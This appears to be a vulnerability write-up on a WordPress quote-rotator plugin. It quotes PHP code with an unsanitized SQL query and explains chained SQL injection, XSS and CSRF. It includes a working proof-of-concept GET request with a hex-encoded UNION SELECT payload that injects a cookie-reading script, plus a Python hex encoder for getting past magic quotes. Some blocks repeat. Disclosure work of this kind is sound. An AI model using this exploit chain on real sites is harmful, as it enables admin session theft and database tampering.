		echo "\\t\\t\\t\\t<input type=\"hidden\" name=\"id\" value=\"".$r->id."\" />\\n";
		echo "\\t\\t\\t\\t<p class=\"submit\">\\n";
		echo "\\t\\t\\t\\t\\t<input type=\"submit\" name=\"submit\" value=\"Update Quote &raquo;\" />\\n";
		echo "\\t\\t\\t\\t</p>\\n";
		echo "\\t\\t\\t</form>\\n";
	}

function displayManagementPage()

{

global $wpdb;

echo "\t\t<div class=\"wrap\">\n";

if( $_GET['action']=='edit' )

{

$sql = "SELECT * FROM `" . $this->tableName . "` WHERE `id` = " . $_GET['id'];

$results = $wpdb->get_results($sql);

$r = $results[0];

echo "\\t\\t\\t<h2>Edit Quote</h2>\\n";

echo "\\t\\t\\t<form name=\"EditQuotesForm\" method=\"post\" action=\"?page=flexi-quote-rotator.php\">\\n";

echo "\\t\\t\\t\\t<p class=\"submit\">\n";

echo "\\t\\t\\t\\t\\t<input type=\"submit\" name=\"submit\" value=\"Update Quote »\" />\\n";

echo "\\t\\t\\t\\t</p>\n";

echo "\\t\\t\\t\\t<table class=\"editform\" width=\"100%\" cellspacing=\"2\" cellpadding=\"5\">\\n";

echo "\\t\\t\\t\\t\\t<tr>\n";

echo "\\t\\t\\t\\t\\t\\t<th width=\"33%\" scope=\"row\" valign=\"top\"><label for=\"quote\">Quote:</label></th>\\n";

echo "\\t\\t\\t\\t\\t\\t<td width=\"67%\"><textarea name=\"quote\" style=\"width:350px;height:200px;\"/>".stripslashes($r->quote)."</textarea></td>\\n";

echo "\\t\\t\\t\\t\\t</tr>\\n";

echo "\\t\\t\\t\\t\\t<tr>\\n";

echo "\\t\\t\\t\\t\\t\\t<th width=\"33%\" scope=\"row\" valign=\"top\"><label for=\"author\">Author:</label></th>\\n";

echo "\\t\\t\\t\\t\\t\\t<td width=\"67%\"><input type=\"text\" name=\"author\" style=\"width:350px;\" value=\"".stripslashes($r->author)."\"/></td>\\n";

echo "\\t\\t\\t\\t\\t</tr>\\n";

echo "\\t\\t\\t\\t</table>\n";

echo "\\t\\t\\t\\t<input type=\"hidden\" name=\"editQuote\" value=\"1\" />\\n";

echo "\\t\\t\\t\\t<input type=\"hidden\" name=\"id\" value=\"".$r->id."\" />\\n";

echo "\\t\\t\\t\\t<p class=\"submit\">\\n";

echo "\\t\\t\\t\\t\\t<input type=\"submit\" name=\"submit\" value=\"Update Quote »\" />\\n";

echo "\\t\\t\\t\\t</p>\\n";

echo "\\t\\t\\t</form>\\n";

}

It does so by checking the action GET parameter first. If it is “edit”, it will then concatenate the “id” GET parameter into a SQL query, and write the result out to the page. But because it does not correctly sanitize the “id” GET parameter, which causes a SQL injection. Also, this piece of code can be invoked without a nonce, which causes a CSRF vulnerability. Additionally, while it output-encodes the author and quote column, it does not encode the ID. This means we have two options for exploiting these 3 vulnerabilities:

Chaining the SQL Injection and the XSS in order to execute javascript in the admins browser
Chaining the SQL Injection and the CSRF in order to execute arbitrary SQL blindly

Here is an example of the former, where we trick the admin user into clicking on our specially crafted URL:

GET /wordpress/wp-admin/tools.php?page=flexi-quote-rotator.php&action=edit&;id=3533 UNION SELECT 0x3122202f3e203c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e3c696e70757420747970653d2268696464656e22206e616d653d226964222076616c75653d2231, 2, 3 HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1342212499%7C2b307f49c397cbf2b578cc5df0902004; wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1342212499%7C8aec90b501bbc30db946f8f6bef9b9d8;

GET /wordpress/wp-admin/tools.php?page=flexi-quote-rotator.php&action=edit&;id=3533 UNION SELECT 0x3122202f3e203c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e3c696e70757420747970653d2268696464656e22206e616d653d226964222076616c75653d2231, 2, 3 HTTP/1.1

Host: 192.168.80.130

Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1342212499%7C2b307f49c397cbf2b578cc5df0902004; wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1342212499%7C8aec90b501bbc30db946f8f6bef9b9d8;

The hex value that we use in order to bypass the magic quotes which WordPress enforces was generated this way:

def ToHexString(input):
	hexString = "0x"
	for s in input:
		hexString += hex(ord(s))[2:]
	return hexString

print ToHexString("1\" /> <script>alert(document.cookie)</script><input type=\"hidden\" name=\"id2\" value=\"1")

def ToHexString(input):

hexString = "0x"

for s in input:

hexString += hex(ord(s))[2:]

return hexString

print ToHexString("1\" /> <script>alert(document.cookie)</script><input type=\"hidden\" name=\"id2\" value=\"1")